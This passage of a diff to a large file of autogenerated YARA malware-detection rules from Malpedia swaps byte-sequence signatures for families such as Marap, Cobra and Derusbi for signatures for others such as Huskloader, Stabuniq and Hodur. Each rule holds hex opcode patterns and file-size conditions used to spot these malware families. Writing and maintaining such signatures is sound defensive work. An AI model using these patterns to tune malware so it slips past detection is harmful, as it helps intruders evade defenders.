-		logic_hash = "546aba24f6e8400321dff7dca511f4540ee158508029bfb4a7f44eaf5c6b5908"
+		logic_hash = "8c2d742c99e41f022aebe397e085bdb9d00214c3c4ebe4e2052113f6ff7a225a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89016,34 +89062,34 @@ rule MALPEDIA_Win_Marap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 57 52 50 51 68???????? }
-		$sequence_1 = { c1f805 8b048580320110 83e61f c1e606 }
-		$sequence_2 = { 8d3c8580320110 8b07 c1e606 f644300401 7436 833c30ff }
-		$sequence_3 = { 6a01 57 68???????? 89bda8fdffff }
-		$sequence_4 = { 68???????? 8d9662030000 e8???????? 8b3d???????? 83c410 68???????? 68???????? }
-		$sequence_5 = { eb22 8386e41d00000f eb19 8386e41d000010 }
-		$sequence_6 = { 0f848d000000 8bc6 8d5002 668b08 83c002 663bcf 75f5 }
-		$sequence_7 = { 895df8 0f8576ffffff 8bd7 5f 8bc6 5e }
-		$sequence_8 = { 50 8dbeb2010000 57 e8???????? }
-		$sequence_9 = { 6683f858 770f 0fb7c2 0fbe80d8cb0010 83e00f }
+		$sequence_0 = { 83ec10 8b4508 8945f0 8b4df0 8b5508 03513c 8955f4 }
+		$sequence_1 = { 8945fc 8d95f8f7ffff 52 e8???????? 83c404 8945f8 8b45f8 }
+		$sequence_2 = { 6a00 e8???????? 83c40c eb41 8b450c 50 68???????? }
+		$sequence_3 = { d1e8 8945f4 8b4d08 894df8 c745fc00000000 eb09 }
+		$sequence_4 = { 6a00 8d4de8 51 6a00 8b55fc }
+		$sequence_5 = { ba01000000 6bc200 c6840588fdffff00 837d0c00 7507 33c0 e9???????? }
+		$sequence_6 = { ff15???????? 8b4df8 51 ff15???????? 8b45e0 }
+		$sequence_7 = { 6a00 6a00 ff15???????? b904000000 }
+		$sequence_8 = { 68???????? 8d8d94f7ffff 51 ff15???????? 8b550c }
+		$sequence_9 = { e9???????? 8d55f0 52 8b45e0 50 8b4de4 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 75776
 }
-rule MALPEDIA_Win_Infy_Auto : FILE
+rule MALPEDIA_Win_Huskloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3e52df24-aedf-51dc-878e-bd87d1c8f8c2"
+		id = "baa8dc28-4bde-5660-bacb-e311987b66fe"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.infy_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.huskloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.huskloader_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "66e1e03eb3c288253d677feb2572d3dd19031bc03f792127c5e2fe93ef218916"
-		score = 60
-		quality = 45
+		logic_hash = "efaf6361c8e2a990c1d94ea51b671a22e525594bb6c413d70cb1d93190351b34"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -89055,34 +89101,34 @@ rule MALPEDIA_Win_Infy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85ff 7e2e 4e 8bd0 }
-		$sequence_1 = { 33d2 e8???????? eb2d 3b7df8 7514 8b45f0 }
-		$sequence_2 = { 740e 8d45d0 50 6a03 ff15???????? 8bd8 85db }
-		$sequence_3 = { 50 89c6 8b449d04 85c0 7412 }
-		$sequence_4 = { 837dec00 740b 8b45f0 8b55f8 }
-		$sequence_5 = { 833d????????00 740e 8d55d0 52 6a01 }
-		$sequence_6 = { b8???????? e8???????? b8???????? e8???????? 807b2800 7514 }
-		$sequence_7 = { 85f6 7d04 33ff eb0a 8bf8 2bfb }
-		$sequence_8 = { 7502 eb06 8b1b 85db }
-		$sequence_9 = { 0fb74af4 870c24 51 8b4afc e9???????? }
+		$sequence_0 = { 8d7f08 8b048d04330010 ffe0 f7c703000000 7413 8a06 }
+		$sequence_1 = { 894db0 8b048de88d0110 8975b4 8b440618 8b7514 }
+		$sequence_2 = { 6a00 6aff 66c7861a0600000111 ff15???????? 85c0 7430 682d060000 }
+		$sequence_3 = { 7712 0fb7c1 0faee8 0fb688181c0110 83e10f eb02 }
+		$sequence_4 = { e8???????? c70016000000 e8???????? 5d c20400 53 56 }
+		$sequence_5 = { 8904bde88d0110 85c0 7514 6a0c 5e 8975e4 c745fcfeffffff }
+		$sequence_6 = { 8db708020000 56 ff15???????? 56 ff15???????? 68???????? }
+		$sequence_7 = { 682d060000 6a00 6a04 6a00 6aff ff15???????? 85c0 }
+		$sequence_8 = { 5e 5d c3 e8???????? 85c0 0f8442310000 c3 }
+		$sequence_9 = { 7551 e8???????? c70021000000 eb44 c745e002000000 c745e4c45e0110 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Cobra_Auto : FILE
+rule MALPEDIA_Win_Stabuniq_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fd128616-d78e-5906-a1c5-ca71a64ca5ee"
+		id = "4275e6d0-94cf-5d7a-8be9-58ce93adc0df"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cobra_auto.yar#L1-L492"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stabuniq_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "e8cb467ce58a2dce4e2587c1e891472f04ba426ad5841eddc54e114fd734ddcf"
+		logic_hash = "27eb79a741b72a16cbff924e64623723e98e0bb2251ce5257f82f37046f960f7"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -89094,79 +89140,32 @@ rule MALPEDIA_Win_Cobra_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7511 e8???????? 85c0 7508 ff15???????? }
-		$sequence_1 = { c20c00 ff25???????? 53 56 57 8bd9 33f6 }
-		$sequence_2 = { 5e 5b c3 83fb01 7405 83fb02 7537 }
-		$sequence_3 = { 7514 391d???????? 754d 33c0 }
-		$sequence_4 = { 8b442438 85c0 757f 8b05???????? }
-		$sequence_5 = { 751c 8bcf ff15???????? 8d8fe8030000 8bf9 }
-		$sequence_6 = { ff25???????? 8b442408 85c0 750e 3905???????? 7e2c }
-		$sequence_7 = { 5b c3 85db 7405 83fb03 753b }
-		$sequence_8 = { 757f 8b05???????? 85c0 0f8e8c000000 83e801 8905???????? }
-		$sequence_9 = { e8???????? 8bf8 83fb01 751d 85ff }
-		$sequence_10 = { 5f 5e 5b c3 85ff 7418 }
-		$sequence_11 = { 33d2 b9e8030000 f7f1 83f805 }
-		$sequence_12 = { 813c0850450000 7503 33c0 c3 }
-		$sequence_13 = { e8???????? ff463c 57 e8???????? }
-		$sequence_14 = { ff15???????? 53 ff7714 8bf0 ff571c 59 }
-		$sequence_15 = { 7407 33c0 e9???????? ff15???????? e9???????? }
-		$sequence_16 = { 8b742408 837e0c00 7507 b865005921 5e c3 837e2800 }
-		$sequence_17 = { 7f07 e8???????? eb26 83c0ff }
-		$sequence_18 = { e8???????? 33db 3bc3 741a }
-		$sequence_19 = { e8???????? eb6d e8???????? 85c0 7564 }
-		$sequence_20 = { ebe4 4533f6 413bee 75f4 }
-		$sequence_21 = { 7564 488b0b 488b01 83385c 7e4b 4c8b505c }
-		$sequence_22 = { e8???????? 498bce 85c0 750e }
-		$sequence_23 = { 7548 488b05???????? 4885c0 743c 488b8c24a0000000 }
-		$sequence_24 = { e8???????? 498bce e8???????? 48832700 }
-		$sequence_25 = { 7504 33c0 eb05 b865005921 }
-		$sequence_26 = { 83781400 750a b865005921 e9???????? }
-		$sequence_27 = { 663bcb 75f4 8b15???????? 8b0d???????? 8910 8b15???????? }
-		$sequence_28 = { ff15???????? 83f87a 740b 3d230000c0 }
-		$sequence_29 = { 51 e8???????? 33c0 83c43c }
-		$sequence_30 = { 6689440ffc 6685c0 75ee f685c003000010 }
-		$sequence_31 = { ff15???????? eb03 8b7d0c 3bfb }
-		$sequence_32 = { 51 6a00 6a00 56 ff15???????? 56 }
-		$sequence_33 = { 6a03 68000000c0 50 ff15???????? 8bf0 83feff 7505 }
-		$sequence_34 = { 83feff 7505 33c0 5e 5d c3 8b4d08 }
-		$sequence_35 = { 50 6a00 6aff e8???????? 85c0 7405 }
-		$sequence_36 = { 8bec 56 6a00 6880000000 6a03 6a00 6a03 }
-		$sequence_37 = { 5d c3 8b4d08 57 51 6a00 }
-		$sequence_38 = { b914000000 84c0 0f45f9 488bce 8bd7 ff15???????? 85c0 }
-		$sequence_39 = { 4584ff 7518 33c0 4881c4480d0000 }
-		$sequence_40 = { 8d8588feffff 68???????? 50 ff15???????? 83c42c }
-		$sequence_41 = { 4533e4 4c8bf1 488bda 488d8d10060000 33d2 41b808020000 4489a5800c0000 }
-		$sequence_42 = { 4c89642448 488d4c2468 48894c2440 4c89642438 }
-		$sequence_43 = { 33d2 488bc8 ff15???????? 488bcf ff15???????? 41b701 }
-		$sequence_44 = { 56 4154 4156 4157 488dac24b8f3ffff }
-		$sequence_45 = { 7507 32c0 e9???????? c745b818000000 }
-		$sequence_46 = { 668b08 83c002 6685c9 75f5 2bc2 d1f8 66837c43fe5c }
-		$sequence_47 = { 33f6 03c2 13ce 51 50 }
-		$sequence_48 = { 0f8456feffff 807c241301 6800080000 0f8544020000 }
-		$sequence_49 = { 05a1000000 50 8d84249c0d0000 68???????? }
-		$sequence_50 = { 05a2000000 50 8d8c249c0d0000 68???????? }
-		$sequence_51 = { 0f84100f0000 6800080000 57 56 }
-		$sequence_52 = { 0f8431ffffff 8b4d08 5f 8931 }
-		$sequence_53 = { 05a2000000 50 8d94249c0d0000 68???????? }
-		$sequence_54 = { 85c0 740a b8050000c0 e9???????? }
-		$sequence_55 = { 668cc8 c3 53 50 }
-		$sequence_56 = { c745d000000000 c745d400000000 8d45c0 50 e8???????? }
+		$sequence_0 = { 6a05 8b55fc 52 8b4510 }
+		$sequence_1 = { 8b913c020000 52 8b45ec 50 8b4df0 51 8b5508 }
+		$sequence_2 = { 8b4508 50 8b4df8 ff91ec000000 8945fc 8b55f0 83ea04 }
+		$sequence_3 = { 8b55fc 52 8b4514 05ab0e0000 50 8b4d0c 51 }
+		$sequence_4 = { 8b4d0c 8d9401b2170000 52 8d85f8fdffff 50 8b4d0c ff5130 }
+		$sequence_5 = { 50 8b8d24fdffff 51 8b5510 ff520c 6a40 }
+		$sequence_6 = { 85c0 7535 8b8decfbffff 6bc928 8b5510 8d840ab2170000 50 }
+		$sequence_7 = { c745f800000000 837dfc00 7e32 8b55f8 83c201 8955f8 8b45fc }
+		$sequence_8 = { 83ba8000000000 750a b801000000 e9???????? 8b45f0 8b8880000000 034d08 }
+		$sequence_9 = { 8b4510 8b4d18 8a9411dc0e0000 8810 8b4510 83c001 }
 
 	condition:
-		7 of them and filesize < 1368064
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Redshawl_Auto : FILE
+rule MALPEDIA_Win_Hodur_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f52543ad-f3b0-5635-b08b-6e314d7ab25e"
+		id = "529f3e13-6dbd-5bfd-9d2e-8112cb176080"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.redshawl_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hodur"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hodur_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "9697ea4899eafca20347b787cabf2930212702df9b80046d2c793afaab560dfd"
+		logic_hash = "52f28b8a0f887df21ab70c260b17a2f99e348211a9b139c663c0b81c4937fcbf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89180,32 +89179,32 @@ rule MALPEDIA_Win_Redshawl_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4889442438 895c2430 4489642428 4c89642420 4533c9 4c8bc6 488d942430010000 }
-		$sequence_1 = { 488b4c2448 e8???????? 90 90 e9???????? 488d542450 418bcc }
-		$sequence_2 = { 7329 4863d1 488d0d90770000 488bc2 }
-		$sequence_3 = { 488d8c2431010000 e8???????? ba04010000 488d8c2440020000 ff15???????? 4c8bde 488d8c2430010000 }
-		$sequence_4 = { 3b3d???????? 737d 488bdf 488bf7 48c1fe05 4c8d25ea7e0000 }
-		$sequence_5 = { 4c8be9 488b05???????? 4885c0 0f8436010000 48833d????????00 }
-		$sequence_6 = { 48895c2408 57 4883ec20 488d1d0b6d0000 488d3d046d0000 }
-		$sequence_7 = { 7532 488d0d239d0000 e8???????? ff15???????? 89442460 488d150c000000 }
-		$sequence_8 = { 8364242800 41b803000000 488d0d6c320000 4533c9 ba00000040 4489442420 }
-		$sequence_9 = { 418bcc e8???????? 8bd8 89442440 85c0 }
+		$sequence_0 = { ff15???????? 83c414 0f2805???????? 833d????????0a 0f11442468 66c74424781b3e c644247a00 }
+		$sequence_1 = { 8b15???????? 8b3d???????? 8d42ff 0fafc2 83e001 83ff0a 7c15 }
+		$sequence_2 = { c684243801000000 7c0f 8d48ff 0fafc8 83e101 0f85a0260000 8d8c2430010000 }
+		$sequence_3 = { 7c0b 8d41ff 0fafc1 83e001 752a 6a5c 55 }
+		$sequence_4 = { c74424080c043500 7c14 a1???????? 8d48ff 0fafc8 83e101 0f85b10b0000 }
+		$sequence_5 = { 6a5c 8d842454040000 50 e8???????? 83c408 833d????????0a 89c7 }
+		$sequence_6 = { c78424e0000000b9ffceff 7c15 8b0d???????? 8d51ff 0fafd1 83e201 0f85ab0a0000 }
+		$sequence_7 = { ebfe 833d????????0a 66c784249a0000000000 7c12 a1???????? 8d48ff 0fafc8 }
+		$sequence_8 = { 7c0d 8d50ff 0fafd0 83e201 7402 ebfe e8???????? }
+		$sequence_9 = { 75f4 c6410d00 e8???????? 53 ff75e4 ffd0 833d????????0a }
 
 	condition:
-		7 of them and filesize < 174080
+		7 of them and filesize < 1067008
 }
-rule MALPEDIA_Win_Wininetloader_Auto : FILE
+rule MALPEDIA_Win_Zxxz_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "362a277f-08db-55d6-afc8-115b8717311e"
+		id = "6bed2c22-407f-5c6f-838c-89149563448f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wininetloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wininetloader_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxxz"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zxxz_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "8b4c276c165b1cb748209b41360afa408d3bb0ddb28615bc03dcc23e6420b5ed"
+		logic_hash = "9578e76393d5b7664234570897b9446d75c18108dd9f2d16b199e15d869c1364"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89219,34 +89218,39 @@ rule MALPEDIA_Win_Wininetloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 66490f7ed9 4c8d050cb70500 ba28000000 488d4ddf e8???????? 4863d8 498b4540 }
-		$sequence_1 = { c3 488b0d???????? ba51230000 ff15???????? 488b0d???????? ba53230000 4889442430 }
-		$sequence_2 = { 5b c3 803d????????00 0f8459ffffff 498bd1 488bcb 4883c430 }
-		$sequence_3 = { 458d4118 488bce ff15???????? 8b442430 4038bc24e0000000 0f45442434 4c63c0 }
-		$sequence_4 = { 48891d???????? 48c705????????0f000000 881d???????? 448d431b 488d15d9be0f00 488d0d522e1200 e8???????? }
-		$sequence_5 = { eb02 b301 4883fa10 722d 48ffc2 488bc1 4881fa00100000 }
-		$sequence_6 = { c6430600 eb21 48c744242006000000 4c8d0dc3d10b00 4533c0 418d5006 488d4c2430 }
-		$sequence_7 = { 803a5c 752a 4c8d4201 4c3bc0 7421 f6c108 750a }
-		$sequence_8 = { e9???????? 488d8aa8000000 4883c108 e9???????? 488d8aa8000000 e9???????? 4055 }
-		$sequence_9 = { 5e 5d c3 ba5e230000 488b4e18 ff15???????? 488bc8 }
+		$sequence_0 = { ffd3 e8???????? 6830750000 ffd3 6a01 6a00 }
+		$sequence_1 = { 68fa000000 50 ffd5 83c40c 68???????? 8d4c2414 }
+		$sequence_2 = { c605????????01 6830750000 ffd3 68???????? }
+		$sequence_3 = { c20400 8bfe 83cf0f 81ffffffff7f 7627 }
+		$sequence_4 = { 8d4c2430 c744241401000000 c644242400 ff15???????? 8bc5 8b4c241c }
+		$sequence_5 = { 83c404 e8???????? 803d????????00 7435 33c0 68fe1f0000 }
+		$sequence_6 = { ff7508 8945f4 6a00 68e9fd0000 ffd0 }
+		$sequence_7 = { 51 ff55ec 83c404 8bc6 8bcf 8901 }
+		$sequence_8 = { 6a01 6a01 68???????? ffd7 a1???????? 2bc3 }
+		$sequence_9 = { 8b01 ff5004 c745fcffffffff 8b9558feffff 83c2f0 }
+		$sequence_10 = { eb23 03c8 c744241c01000000 83fa02 770c 8079fe3d 7506 }
+		$sequence_11 = { 33c0 68f8000000 8bd9 50 }
+		$sequence_12 = { c705????????1cb94000 7410 a1???????? 85c0 7407 50 }
+		$sequence_13 = { 85c0 0f84ef000000 eb06 8bc7 8930 }
+		$sequence_14 = { 8bc6 8931 6a00 6a00 53 }
 
 	condition:
-		7 of them and filesize < 2659328
+		7 of them and filesize < 4142080
 }
-rule MALPEDIA_Win_Tinyloader_Auto : FILE
+rule MALPEDIA_Win_Uacme_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7c6fcb6a-6aaa-5e44-ad0b-2dda057bc513"
+		id = "53c60ae4-37ff-5d21-9239-76220be2dce4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tinyloader_auto.yar#L1-L224"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.uacme_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "a1e9a6fc8f29154daa76951045f8f779a6cee8d3fa483fe0d801eb90e6460914"
+		logic_hash = "3f55ec845579c619785e67b0034681c5b25544222a3c6be5c29fd4298627878a"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -89258,44 +89262,32 @@ rule MALPEDIA_Win_Tinyloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f7d2 f7d1 5b 89d0 c1c010 6689c8 90 }
-		$sequence_1 = { 8b1d???????? 90 8998f8070000 90 }
-		$sequence_2 = { 83ec20 48 8d0db7130000 48 }
-		$sequence_3 = { 90 29d8 90 31db }
-		$sequence_4 = { 895838 90 48 89c6 90 48 0500400100 }
-		$sequence_5 = { 8b5d00 66894308 6a10 ffb5a8050000 }
-		$sequence_6 = { 637574 6541 0050ff 15???????? c705????????00010000 68???????? 68???????? }
-		$sequence_7 = { 81fb04030000 730d 90 83c004 90 83c304 }
-		$sequence_8 = { 90 0500400100 90 31db 90 90 }
-		$sequence_9 = { 0500080000 894520 ffb5a0050000 6802020000 ff15???????? }
-		$sequence_10 = { 8998f8070000 90 48 8b1d???????? 90 }
-		$sequence_11 = { 48 8d0dedffffff ff15???????? 48 83c420 }
-		$sequence_12 = { c70000000000 c7855808000000000000 8b5d00 039d58080000 6a00 }
-		$sequence_13 = { 83ec20 48 c7c100000000 48 8d15e6110000 }
-		$sequence_14 = { 90 8bbb97114000 90 8938 90 }
-		$sequence_15 = { 8b8540050000 8b5d00 894308 8b85f8070000 8b5d00 894304 }
-		$sequence_16 = { 3b8558080000 7402 ebb3 31c0 31db 31c9 31d2 }
-		$sequence_17 = { 8b1d???????? 90 895830 90 8b1d???????? 90 895838 }
-		$sequence_18 = { 8b85f8070000 8b5d00 894304 8b5d00 81c300040000 31c0 }
-		$sequence_19 = { 8b4500 83c00c ffd0 31db 8b4500 8b8000040000 }
-		$sequence_20 = { 8d0dea0e0000 ff15???????? 48 83c420 48 8d35d90e0000 48 }
-		$sequence_21 = { 01da 83c20c 310a 3b8558080000 7308 83c004 }
+		$sequence_0 = { 8d45e8 50 ff15???????? 2175f8 8d45f8 50 8d45f0 }
+		$sequence_1 = { 8d85ecfbffff 50 8d85ccf3ffff 50 }
+		$sequence_2 = { 50 8d45b4 50 68???????? ff15???????? 8bf0 }
+		$sequence_3 = { 8bcf c60000 40 83e901 75f7 8b1d???????? 394d10 }
+		$sequence_4 = { ff75f4 53 ff15???????? ff75fc 53 ff15???????? 6807700000 }
+		$sequence_5 = { 83ee01 75f7 68???????? 8d85c8fdffff 50 }
+		$sequence_6 = { 5d c3 ff7508 8bd3 8d8de0f7ffff e8???????? 59 }
+		$sequence_7 = { 8975dc 8975cc 85f6 7421 8b55e0 }
+		$sequence_8 = { 8906 5e 8b45fc 8be5 5d c3 55 }
+		$sequence_9 = { 3db7000000 0f8593010000 ba???????? 8d8ddcfbffff e8???????? 6a00 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 565248
 }
-rule MALPEDIA_Win_Seasalt_Auto : FILE
+rule MALPEDIA_Win_Xpan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "53347621-44c1-525f-89d0-f50b729b9b9d"
+		id = "9c9e2899-7c42-5d4a-8e72-8695f33e2151"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.seasalt_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xpan_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "efb41d41f20a6c99bb3444a374f65b02c8e63a28ca4361b924bf5bfe71fe1970"
+		logic_hash = "02ec4378c7469aa379433aa31077402814d90eca993bb596a3f9dbc0c47c27e0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89309,32 +89301,32 @@ rule MALPEDIA_Win_Seasalt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d842474010000 6804020000 50 51 ffd5 }
-		$sequence_1 = { f7d1 2bf9 8d9578fcffff 8bc1 8bf7 8bfa 8d9578fdffff }
-		$sequence_2 = { eb26 8d4508 8db67ccb0010 6a00 50 ff36 }
-		$sequence_3 = { 33c0 53 57 8a1c10 }
-		$sequence_4 = { 81ec90010000 8d442400 50 6801010000 ff15???????? f7d8 1bc0 }
-		$sequence_5 = { 6a00 8d55e8 6a08 52 50 ffd3 8d4de0 }
-		$sequence_6 = { 8d8c247c010000 6880000000 51 ff15???????? b981000000 }
-		$sequence_7 = { 83f964 7d08 8a4301 43 3c2f 75eb }
-		$sequence_8 = { a1???????? 53 53 68???????? 8d942484000000 6800020000 }
-		$sequence_9 = { 51 ff15???????? 8d542412 52 }
+		$sequence_0 = { 8b16 899310010000 8b542414 e8???????? 89b310010000 e9???????? 8b6904 }
+		$sequence_1 = { 8b4d10 85c9 0f84cdfdffff 66837d14ff bb01000000 0f84d7000000 8b4d08 }
+		$sequence_2 = { 0fb64c2454 8b442440 896c2408 88542418 890424 894c2404 }
+		$sequence_3 = { 8b4508 c685f0feffff00 890424 e8???????? 8d8d60ffffff 8985d4feffff e8???????? }
+		$sequence_4 = { b904000000 89f5 e9???????? 8b8c24b0000000 8b5004 8b00 }
+		$sequence_5 = { 89eb 0f841dffffff f744245400040000 7483 0fb6442454 89742408 892c24 }
+		$sequence_6 = { 8b4bf4 85c9 7438 807dc600 8d45e4 8945c8 }
+		$sequence_7 = { 89d3 75ed 8b4728 83f8ff 7475 39f0 0f4df0 }
+		$sequence_8 = { 7412 85ff 0f846e010000 85c0 ba???????? 0f44c2 85f6 }
+		$sequence_9 = { 85d2 89742418 8b6c2444 8b74241c 0f8571feffff c647ff00 b801000000 }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 3235840
 }
-rule MALPEDIA_Win_Derusbi_Auto : FILE
+rule MALPEDIA_Win_Fishmaster_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c6e0e6e7-cbdf-5891-a775-1ae225a23d68"
+		id = "85781cdb-ef0a-5ba4-9f1c-a71e1fb971a5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.derusbi_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fishmaster"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fishmaster_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "36fd1aba73e044d12574f8ec4270d71e7197a2500df09c018d411307abbf5635"
+		logic_hash = "fa4353e268ca10ee73320d72c1e5a21f512b82d4c18bb38fa107cace5c168150"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89348,32 +89340,32 @@ rule MALPEDIA_Win_Derusbi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 75be 8b45c8 895db0 895dac 3bc3 0f84affeffff }
-		$sequence_1 = { 72e4 5e c3 55 8bec 51 53 }
-		$sequence_2 = { 6810040000 ff15???????? 8985f8fdffff 85c0 7464 }
-		$sequence_3 = { ff7508 ff15???????? 8bf0 59 85f6 740f ff7508 }
-		$sequence_4 = { 56 89442418 57 8d442424 50 8d44242c 50 }
-		$sequence_5 = { 83c108 3d00040000 72f1 e9???????? 215cc70c 8d5cc710 }
-		$sequence_6 = { 50 ff15???????? 83c40c 56 8d4c2470 51 889c2407010000 }
-		$sequence_7 = { 83c40c 8d45dc 50 ff15???????? 83f8ff 740d a810 }
-		$sequence_8 = { 53 50 ffd6 83c40c 8d442424 50 8d84242cbc0200 }
-		$sequence_9 = { 8d85b8f7ffff e8???????? 59 33c9 85c0 7e25 80b40db8fbffff99 }
+		$sequence_0 = { b9e8030000 ff15???????? 4c89742450 48c74424580f000000 }
+		$sequence_1 = { 8d45fd 4863c8 460fbe0401 418d40bf 3c19 7706 }
+		$sequence_2 = { 7203 4c8b03 8d45ff 4863c8 }
+		$sequence_3 = { 488d0d25310000 0f57c0 488d5308 48890b 488d4808 0f1102 ff15???????? }
+		$sequence_4 = { 488bcb 41ffd5 90 488b5558 4883fa10 7234 }
+		$sequence_5 = { ba05000020 488bcb ff15???????? 488bcb ff15???????? c744243000010000 }
+		$sequence_6 = { 488d054d2a0000 c3 8325????????00 c3 48895c2408 55 }
+		$sequence_7 = { 4983f910 7203 4c8b03 8d45ff 4863c8 460fbe0401 418d40bf }
+		$sequence_8 = { 83f828 7309 33c9 ff15???????? cc }
+		$sequence_9 = { 4883f801 721c 488d4101 48894310 4883fa10 488bc3 7203 }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 812032
 }
-rule MALPEDIA_Win_Blacklotus_Auto : FILE
+rule MALPEDIA_Win_Pulsartea_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6d41c095-e739-5655-a8fc-e5651a304950"
+		id = "492a2a3f-efe7-5dcc-8ea0-f274f56c1d7a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacklotus"
